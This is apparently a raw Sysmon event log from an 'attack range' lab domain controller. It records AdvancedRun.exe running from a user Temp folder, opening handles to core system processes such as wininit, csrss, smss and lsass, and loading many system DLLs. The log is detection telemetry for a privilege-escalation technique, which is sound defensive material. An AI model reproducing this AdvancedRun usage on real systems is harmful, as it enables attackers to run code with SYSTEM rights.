20:08:57.645{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.645{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.644{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004067414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.644{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004067413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.643{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.639{834264DD-DAE4-61EA-0C00-000000002702}6523980C:\Windows\system32\lsass.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004067411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.628{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.626{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.626{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.626{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.625{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.623{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.621{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.617{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.614{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.613{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.610{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.608{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.603{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.602{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.600{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.597{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.596{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.596{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.595{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.595{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 